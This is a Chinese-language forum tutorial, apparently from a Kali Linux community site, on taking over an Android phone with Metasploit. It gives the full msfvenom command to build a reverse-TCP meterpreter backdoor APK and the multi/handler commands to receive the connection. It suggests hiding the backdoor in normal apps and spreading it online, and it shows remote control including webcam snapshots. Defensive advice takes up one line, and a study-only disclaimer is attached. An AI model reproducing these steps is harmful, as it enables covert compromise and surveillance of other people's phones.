找回密码
 立即注册
文章来自Kali中文网论坛(www.kaliorg.com)

      本!!!

文本演示怎么使用Kali Linux入侵Android手机。
Kali Linux IP地址:192.168.0.112;接收连接的端口:443。
2017-04-25-14916411615769.png
同一局域网内android手机一部(android 5.1)
创建一个后门程序
在终端中执行:
# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=443 > my_backdoor.apk
这个后门程序(APK)是发送给受害者的;要把上面命令的IP地址替换为攻击者IP,当后门程序运行时,它会试图连接这个IP。
启动Metasploit-等待受害者启动后门程序msfconsole
2017-04-25-14916412005880.png
依次执行:
msf > use exploit/multi/handler    > set payload android/meterpreter/reverse_tcp    > set lhost 192.168.0.112    > set lport 443    > exploit
2017-04-25-14916412189083.png
分发后门程序
一般后门程序都打包到正常app中,反正就是各种藏;
借助internet分发后门程序。
闲话不多书,这里我在自己的android手机上安装运行带后门的apk。
2017-04-25-14916412390423.jpg
病毒!!!
控制受害者手机
受害者运行后门程序之后,就可以使用Metasploit控制他了:
2017-04-25-14916412586255.png
使用help查看可以使用的命令:
2017-04-25-14916412682896.png
例如使用对方的摄像头拍照:
> webcam_list> webcam_snap
怎么防范:
  • 不要安装不信任的apk
2017-04-25-14916413029124.png

安全无边疆,努力习知识


本文章只供学习交流学习不可用于其他非法用途!!!
文章作者:admin。
文章来源:kali中文网论坛:www.kaliorg.com
版权声明:凡注明“来源:kali中文网”的所有作品,均为kali中文网以作者的作品,未经作者及网站授权不得转载、摘编或利用其它方式使用上述作品。已经本网授权使用作品的,应在授权范围内使用,并注明“来源:kali中文网(www.kaliorg.com)”。违反上述声明者,本站将追究其相关法律责任
分享至 : QQ空间
收藏

1 个回复

倒序浏览
666
回复 使用道具 举报
您需要登录后才可以回帖 登录 | 立即注册